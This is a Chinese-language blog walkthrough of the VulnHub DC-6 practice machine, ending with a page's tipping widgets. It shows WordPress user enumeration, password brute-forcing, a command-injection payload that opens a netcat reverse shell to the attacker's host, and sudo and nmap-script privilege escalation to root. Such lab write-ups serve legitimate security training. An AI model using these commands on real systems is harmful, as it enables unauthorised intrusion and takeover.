DC系列靶机-DC6

一,环境的搭建

VM17 官网下载

kali 2023.4版 https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2023.4/

靶场文件 https://download.vulnhub.com/dc/DC-6.zip

二,攻略

首先进行主机发现;

接下来进行端口扫描;

开放了22端口和80端口;

首先进行访问;

页面直接跳转;

想到dc-2;也是这种情况,进行同样的操作;

添加的内容:
192.168.20.148 wordy

这样就可以实现页面的正常访问;

发现是一个word press的CMS;

接下来我们仿照dc-2靶机的操作;

接下来针对word press使用wpscan进行扫描;

wpscan --url http://wordy -e u

拿到了几个用户名;

接下来尝试爆破ssh(由于22端口是开放的);

并未爆破成功,账号密码可能不是ssh;

尝试扫描一下目录;

wordpress的后台登录页面;

用前面拿到的账号爆破;

最后得到一组账号密码;

账号:mark
密码:helpdesk01

登录成功;

这里存在一个命令执行;

构造payload;

127.0.0.1|nc -nv 192.168.20.151 4444 -e /bin/bash

发现输入框对长度有限制;

这里可以使用burp抓包,也可以直接修改前端页面;

kali监听4444端口;

nc -lnvp 4444

连接成功;

python -c "import pty;pty.spawn('/bin/bash')"

在/home目录下的mark用户的根目录下找到一个graham用户的密码;

现在尝试切换用户;

切换成功;

sudo -l
查看该用户可以以root权限执行哪些命令;

这里比较有意思的是graham用户与jens用户类似;

并且可以执行这个脚本:/home/jens/backups.sh

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens ./backups.sh

成功切换到了jens用户;

接着继续查看可以使用root权限执行的命令;

接下来我们可以使用nmap这个命令来提权;

nmap提权(可以上网查找有关的知识点);

echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

其中的TF为一个临时文件;

进行提权:

echo "os.execute('/bin/bash')" > /tmp/shell
sudo nmap --script=/tmp/shell

最后拿到最终的flag;

三,结论

hosts文件优先解析,优先级高于DNS;

暴力破解在某些时候很有用;

根据可执行的脚本文件,获取shell;

nmap提权的方法;

在创建临时文件的时候,一般选择/tmp目录,这个目录对于几乎所有的用户都有权限;

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

慕舟舟.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值